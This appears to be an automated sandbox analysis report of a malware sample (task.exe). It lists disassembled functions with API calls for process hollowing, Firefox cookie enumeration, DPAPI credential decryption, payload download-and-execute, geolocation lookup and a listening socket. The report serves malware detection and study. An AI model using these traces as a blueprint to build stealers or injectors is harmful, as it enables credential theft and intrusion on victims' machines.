                                                                                                                                                                • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 000765E5
                                                                                                                                                                • NtUnmapViewOfSection.NTDLL(0006421E,?), ref: 0007660A
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,0006421E,0006421E,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00076627
                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00076639
                                                                                                                                                                • NtClose.NTDLL(?), ref: 00076642
                                                                                                                                                                • TerminateProcess.KERNEL32(0006421E,00000000), ref: 0007664C
                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00076685
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,00000000), ref: 0007668F
                                                                                                                                                                • WriteProcessMemory.KERNEL32(0006421E,?,0006421E,00000004,00000000), ref: 0007673F
                                                                                                                                                                • Wow64SetThreadContext.KERNEL32(FFFFDD03,00000000), ref: 0007675B
                                                                                                                                                                • ResumeThread.KERNEL32(FFFFDD03), ref: 00076768
                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0007677F
                                                                                                                                                                • GetCurrentProcess.KERNEL32(?), ref: 00076789
                                                                                                                                                                • NtUnmapViewOfSection.NTDLL(00000000), ref: 00076790
                                                                                                                                                                • NtClose.NTDLL(?), ref: 00076799
                                                                                                                                                                • TerminateProcess.KERNEL32(0006421E,00000000), ref: 000767A3
                                                                                                                                                                • GetLastError.KERNEL32 ref: 000767AB
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmapWow64$AllocErrorLastReadResumeWrite
                                                                                                                                                                • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                                                                                                • API String ID: 3150337530-3035715614
                                                                                                                                                                • Opcode ID: 0b95feb125f786a2f43ceac0ae5affd588e51665701a09c2c96239e0bfc848ad
                                                                                                                                                                • Instruction ID: e885ca2edebd24628b31ad3c3e0cfe17553861ecfc032da233149532cf7e63d6
                                                                                                                                                                • Opcode Fuzzy Hash: 0b95feb125f786a2f43ceac0ae5affd588e51665701a09c2c96239e0bfc848ad
                                                                                                                                                                • Instruction Fuzzy Hash: 12B18EB1E00605AFEF148FA4DC89FAEBBB9FF44705F144129F606EA190D779A840CB65
                                                                                                                                                                Function 0006BF45 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 136fileCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1324 6bf45-6bfa6 call 99a4f call 642a7 call 68aaa call 68bcd call 61f24 FindFirstFileW call 61f29 1337 6bfa8-6bfb4 call 642a7 1324->1337 1338 6bfb9-6bfc1 call 6210e 1324->1338 1343 6c0d9-6c0e8 call 61f29 1337->1343 1344 6c0a8-6c0b8 FindNextFileW 1338->1344 1346 6bfc6-6bfcd 1344->1346 1347 6c0be-6c0cc FindClose call 642a7 1344->1347 1346->1344 1349 6bfd3-6bfd8 1346->1349 1351 6c0d1-6c0d4 call 62000 1347->1351 1352 6bfde-6bfe4 1349->1352 1351->1343 1353 6bfe6-6bfe9 1352->1353 1354 6c004-6c006 1352->1354 1357 6c000-6c002 1353->1357 1358 6bfeb-6bff3 1353->1358 1356 6c009-6c00b 1354->1356 1356->1344 1359 6c011-6c016 1356->1359 1357->1356 1358->1354 1360 6bff5-6bffe 1358->1360 1361 6c01c-6c022 1359->1361 1360->1352 1360->1357 1362 6c024-6c027 1361->1362 1363 6c042-6c044 1361->1363 1364 6c03e-6c040 1362->1364 1365 6c029-6c031 1362->1365 1366 6c047-6c049 1363->1366 1364->1366 1365->1363 1367 6c033-6c03c 1365->1367 1366->1344 1368 6c04b-6c09e call 642a7 call 68bcd call 63069 call 61f29 * 2 call 61f24 PathFileExistsW 1366->1368 1367->1361 1367->1364 1381 6c0a0-6c0a3 call 61f29 1368->1381 1382 6c0e9-6c0f6 FindClose call 63353 1368->1382 1381->1344 1385 6c0fb-6c103 call 61f29 1382->1385 1385->1351
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00068BCD: char_traits.LIBCPMT ref: 00068BE8
                                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0006BF93
                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0006C0B0
                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0006C0BF
                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0006C0EA
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Find$CloseFile$FirstNextchar_traits
                                                                                                                                                                • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                                                                • API String ID: 2264501223-405221262
                                                                                                                                                                • Opcode ID: 6185b7b0d4f039b8c30f8d86c0d4120b4f0594136b171d605689b6498fa41f0f
                                                                                                                                                                • Instruction ID: 0e9a4bfc50b57ee71007a58ba4edde9d7e86bd46ebec4f10de613d34e107374e
                                                                                                                                                                • Opcode Fuzzy Hash: 6185b7b0d4f039b8c30f8d86c0d4120b4f0594136b171d605689b6498fa41f0f
                                                                                                                                                                • Instruction Fuzzy Hash: B641B3316101199AFB24FBA0CC56EFE73BBAF20700F440179E542A7192EF759A89CB40
                                                                                                                                                                Function 100010F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1465 100010f1-10001166 call 10002c40 * 2 lstrlenW call 10002c40 lstrcatW lstrlenW 1472 10001177-1000119e lstrlenW FindFirstFileW 1465->1472 1473 10001168-10001172 lstrlenW 1465->1473 1474 100011a0-100011a8 1472->1474 1475 100011e1-100011e9 1472->1475 1473->1472 1476 100011c7-100011d8 FindNextFileW 1474->1476 1477 100011aa-100011c4 call 10001000 1474->1477 1476->1474 1479 100011da-100011db FindClose 1476->1479 1477->1476 1479->1475
                                                                                                                                                                APIs
                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                                                                • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                                                                • FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1083526818-0
                                                                                                                                                                • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                                                                • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                                                                                                                                • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                                                                • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6
                                                                                                                                                                Function 6FE7C7F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 91filenativesynchronizationCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1481 6fe7c7f0-6fe7c817 1482 6fe7c834-6fe7c838 1481->1482 1483 6fe7c819-6fe7c832 1481->1483 1484 6fe7c83a-6fe7c860 NtReadFile 1482->1484 1483->1484 1485 6fe7c862-6fe7c86b WaitForSingleObject 1484->1485 1486 6fe7c86f-6fe7c874 1484->1486 1485->1486 1487 6fe7c876-6fe7c87d 1486->1487 1488 6fe7c87f-6fe7c884 1486->1488 1489 6fe7c891 1487->1489 1490 6fe7c886-6fe7c888 1488->1490 1491 6fe7c8ab-6fe7c90f call 6fe77160 call 6fe730e0 1488->1491 1494 6fe7c894-6fe7c89b 1489->1494 1492 6fe7c89c-6fe7c8a9 RtlNtStatusToDosError 1490->1492 1493 6fe7c88a-6fe7c88e 1490->1493 1492->1494 1493->1489
                                                                                                                                                                APIs
                                                                                                                                                                • NtReadFile.NTDLL ref: 6FE7C855
                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6FE7C865
                                                                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 6FE7C89D
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorFileObjectReadSingleStatusWait
                                                                                                                                                                • String ID: 0o$0o$0o
                                                                                                                                                                • API String ID: 3583596364-1003907229
                                                                                                                                                                • Opcode ID: 971d1ad573063ad43e20923d22fc745ed62fde38706981c165320b503fef3840
                                                                                                                                                                • Instruction ID: 8572703ac7ee9bfb497e46e91d7c352e731742b1713015d3e6882fdfbd618bfb
                                                                                                                                                                • Opcode Fuzzy Hash: 971d1ad573063ad43e20923d22fc745ed62fde38706981c165320b503fef3840
                                                                                                                                                                • Instruction Fuzzy Hash: 09316074608305AFE710CF18C844B9BBFE9FB85718F208A1EF59497290D774E949CB92
                                                                                                                                                                Function 00079664 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70networkfileCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0007968C
                                                                                                                                                                • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 000796A3
                                                                                                                                                                • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 000796BA
                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 000796FA
                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 000796FF
                                                                                                                                                                Strings
                                                                                                                                                                • http://geoplugin.net/json.gp, xrefs: 0007969A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                                                                                • String ID: http://geoplugin.net/json.gp
                                                                                                                                                                • API String ID: 3121278467-91888290
                                                                                                                                                                • Opcode ID: 3720bf58a4b36e95b840ab78a1d77444edfaaf9d692a57e2f18f4cac3e67fae7
                                                                                                                                                                • Instruction ID: 727b9bfd702f0ee40f3a6ac0c757daf792265697a6d34bad206f35ab248bf7bd
                                                                                                                                                                • Opcode Fuzzy Hash: 3720bf58a4b36e95b840ab78a1d77444edfaaf9d692a57e2f18f4cac3e67fae7
                                                                                                                                                                • Instruction Fuzzy Hash: 6F11B231901114BBDB24EB66DC5ADEFBFFDEF0A360F204169F505A3141DA795E00CAA4
                                                                                                                                                                Function 0006E304 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00071919: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00071939
                                                                                                                                                                  • Part of subcall function 00071919: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,000D22B8), ref: 00071957
                                                                                                                                                                  • Part of subcall function 00071919: RegCloseKey.KERNEL32(?), ref: 00071962
                                                                                                                                                                • Sleep.KERNEL32(00000BB8), ref: 0006E3B8
                                                                                                                                                                • ExitProcess.KERNEL32 ref: 0006E427
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                                                                                • String ID: 4.9.4 Pro$override$pth_unenc
                                                                                                                                                                • API String ID: 2281282204-930821335
                                                                                                                                                                • Opcode ID: dc075344272d5cc86dbc9e136d64f9a18123e8ef505b0f543cf8c6d14de4ebd2
                                                                                                                                                                • Instruction ID: d66275b3495f08f3183a51f00281bb27d6bd512597e1446407e52541747c354c
                                                                                                                                                                • Opcode Fuzzy Hash: dc075344272d5cc86dbc9e136d64f9a18123e8ef505b0f543cf8c6d14de4ebd2
                                                                                                                                                                • Instruction Fuzzy Hash: E821C131F1024067D618B7B9885BEEE759B9B90B10F44852CF9094B3C7EF699F0483A7
                                                                                                                                                                Function 00066F61 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0006706D
                                                                                                                                                                • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00067151
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DownloadExecuteFileShell
                                                                                                                                                                • String ID: C:\Users\user\task.exe$open
                                                                                                                                                                • API String ID: 2825088817-3696620667
                                                                                                                                                                • Opcode ID: c0f49df1a97f7db7aafd775fa451dd18fe4a9f4a2de269132bcaaa6e98672a90
                                                                                                                                                                • Instruction ID: 263fff3848b74823b9ddb1f4888294dfb97c736d295b35ae72bfb8dd426026ca
                                                                                                                                                                • Opcode Fuzzy Hash: c0f49df1a97f7db7aafd775fa451dd18fe4a9f4a2de269132bcaaa6e98672a90
                                                                                                                                                                • Instruction Fuzzy Hash: 4061C4316083015ACA18FB748CA7DFE37E7AF91714F040A2DF9865B5C7EE25DA04C2A2
                                                                                                                                                                Function 00066AFD Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData,?,?,00066AB5,?,?,00000000,00000000), ref: 00066B1C
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00066B23
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                • String ID: CryptUnprotectData$crypt32
                                                                                                                                                                • API String ID: 2574300362-2380590389
                                                                                                                                                                • Opcode ID: 79c748e6a9103cf2b41c4056f99312c1bbb3c38f283878cabfb5b9b446b16792
                                                                                                                                                                • Instruction ID: 421be1fced20c63375488a06a653925f1a6ed0143467d5a709e09de6bf6b2124
                                                                                                                                                                • Opcode Fuzzy Hash: 79c748e6a9103cf2b41c4056f99312c1bbb3c38f283878cabfb5b9b446b16792
                                                                                                                                                                • Instruction Fuzzy Hash: 5D01D475A04206EBDB18CFADDC94DBEBFF9EB49300F04026DE959D7240D776994087A0
                                                                                                                                                                Function 6FE7F8E0 Relevance: 6.1, APIs: 4, Instructions: 105networkCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 6FE7CA20: WSASocketW.WS2_32(00000017,00000000,00000000,00000000,00000000,00000081), ref: 6FE7CA4D
                                                                                                                                                                • bind.WS2_32(?,?,00000010), ref: 6FE7F9D4
                                                                                                                                                                • listen.WS2_32(?,00000080), ref: 6FE7F9E5
                                                                                                                                                                • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,6FE45B22), ref: 6FE7F9F8
                                                                                                                                                                • closesocket.WS2_32(?), ref: 6FE7FA0F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLastSocketbindclosesocketlisten
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1850986032-0
                                                                                                                                                                • Opcode ID: 91cfd50c002f5bcf447ab98293d605303e327cf50219d0d0e328101e488ea937
                                                                                                                                                                • Instruction ID: d6474a92b1a67c8da8207d3e5d2a03c768fb8cb664cb4374d349545a952f3451
                                                                                                                                                                • Opcode Fuzzy Hash: 91cfd50c002f5bcf447ab98293d605303e327cf50219d0d0e328101e488ea937
                                                                                                                                                                • Instruction Fuzzy Hash: 0041D370904399DFCB10CFA8D1806AEFFF1EF56310F24855AE895AB391E738A984C761
                                                                                                                                                                Function 00091181 Relevance: 4.5, APIs: 3, Instructions: 33encryptionCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00000000,00000000,?,00090E3A,00000034,00000000,?,?), ref: 00091196
                                                                                                                                                                • CryptGenRandom.ADVAPI32(00000000,?,?,?,00090E3A,00000034,00000000,?,?), ref: 000911AB
                                                                                                                                                                • CryptReleaseContext.ADVAPI32(00000000,00000000,?,00090E3A,00000034,00000000,?,?), ref: 000911BD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1815803762-0
                                                                                                                                                                • Opcode ID: 2271abe7fd712f6263c938865c75c330fac77fbc99055d9efd1793425e6cf42c
                                                                                                                                                                • Instruction ID: cd8480e8bbce6906fe0984ca52f3cf9db8e25ccbfc044a74555ea53373de74b5
                                                                                                                                                                • Opcode Fuzzy Hash: 2271abe7fd712f6263c938865c75c330fac77fbc99055d9efd1793425e6cf42c
                                                                                                                                                                • Instruction Fuzzy Hash: 60F06D31398215BEFF301F16EC08FD73E99DB81BA0F200225F709E50E4D6668800A698
                                                                                                                                                                Function 000798EE Relevance: 3.0, APIs: 2, Instructions: 41COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetComputerNameExW.KERNEL32(00000001,?,0000000B,000D2318), ref: 0007990B
                                                                                                                                                                • GetUserNameW.ADVAPI32(?,00000010), ref: 00079923
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Name$ComputerUser
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4229901323-0
                                                                                                                                                                • Opcode ID: ff5ae9eb8943728715753b33112713a7e2f8a9a8047e9c2fc96726ac4c49ab0f
                                                                                                                                                                • Instruction ID: a7551d80c700f5503fb4d951a7f62e80a881a8343ca42e708e8e796af858c8e0
                                                                                                                                                                • Opcode Fuzzy Hash: ff5ae9eb8943728715753b33112713a7e2f8a9a8047e9c2fc96726ac4c49ab0f
                                                                                                                                                                • Instruction Fuzzy Hash: E7016D7290011CAFDB00EBD4EC45EEEB7BCEF44301F104166B801A3192EEB46F888BA4
                                                                                                                                                                Function 0006E42E Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,0007383C,000D1EC0,000D29D0,000D1EC0,00000000,000D1EC0,00000000,000D1EC0,4.9.4 Pro), ref: 0006E442
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InfoLocale
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2299586839-0
